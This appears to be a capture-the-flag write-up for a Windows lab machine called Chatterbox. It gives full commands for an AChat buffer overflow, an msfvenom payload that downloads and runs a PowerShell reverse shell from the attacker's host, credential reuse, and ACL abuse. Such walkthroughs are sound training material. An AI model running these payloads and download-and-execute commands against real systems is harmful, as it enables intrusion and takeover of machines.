Chatterbox

Information Gathering

Nmap Recon Results

we begin identifiyng the Os System in our targeted machine ttl-recon Windows System

Nmap Recon Open Ports

Well now we will identify the possible open ports on the server to have a clearer idea about what services run on it

nmap -sS --min-rate 5000 -p- --open -n 10.129.40.4 -Pn -vvvv

Scan Open Ports

as can see only have 2 open ports we will investigate what they are about.

Service and version detection

nmap -sC -sV -p 9255-9256 10.129.40.4  -n -oN targeted

Service Detection

Okay, now I had a little something to go on. I hit the discovered services with a version scan to obtain more information:

A little bit of research told me that https://sourceforge.net/projects/achat/ is a freeware solution for conducting instant messaging and file sharing across a LAN. A little bit more research told me that some versions of it are vulnerable to a remote buffer overflow attack.

vulnerability identification

searchsploit achat

Identifiyng Achat Exploit

Exploit Db Link

https://www.exploit-db.com/exploits/36025

we will modify our exploit code with in the following lines and change for the direccion and port to the server

Change ip and Ports

with the intention to gain access to the system we need create a payload with msfvenom with the follow instruccion to execute a powershell command to make a get request and execute that code in memory

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.35:80/shell.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f py

Instruction Payload

Exploit Invoke-Powershell-Tcp.ps1

now we share the file “Invoke-PowershellTcp.ps1” from nishang repository so that the server finds the resource that we specify in our payload, and we can obtain the reverse connection. But before that, we will first modify our shell.ps1 script so that after the code has been loaded into memory on the server side, it executes the following instruction Instruction To execute

Buffer OverFlow Exploit

how as can see from the server side a GET request is sent to our http in python server and we obtain a reverse conection

Privilege Escalation

Method I

System Enumeration enumerating the system we note that we do not have privilege tokens that we could abuse. Token Privileges

Active Connections

we list all active conections on the servers to obtain more information, In the event that we run out of options to gain privileges, we will investigate more about what we can find

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       360
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       792
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       920
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       452
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       476
  TCP    10.129.40.4:139        0.0.0.0:0              LISTENING       4
  TCP    10.129.40.4:9255       0.0.0.0:0              LISTENING       5380
  TCP    10.129.40.4:9256       0.0.0.0:0              LISTENING       5380
  TCP    10.129.40.4:49158      10.10.14.35:443        ESTABLISHED     460

to list the system we will use the Powerup script, to identify possible ways of exploitation to gain privileges

Alfred Credentials

Credentials :

Alfred :  Welcome1!

now we have a valid credentials so we could try to reuse that credential with other users

#(proving that we can start processes)
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.35/shell.ps1')"

#(Save our Password)
$Secpass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force

#(Generating Credentials object)
$cred = New-Object System.Management.Automation.PSCredential('Administrator',$Secpass)

ReUse Credentials

Token Privileges like Administrator user

we can use common exploits like juicy potato.

Method II

Checking Acl Administrator

	Get-Acl | FL *

Administrator ACL

We can see that we have full permissions in the “C:\Users\Administrator\Desktop” directory, which means that we can take advantage of that to give ourselves the permissions to modify, execute or read files in said directory

icacls root.txt /T /grant alfred:F

Acl root.txt

now we have full control of the file “root.txt” so we can read,modify or execute the file what ever our want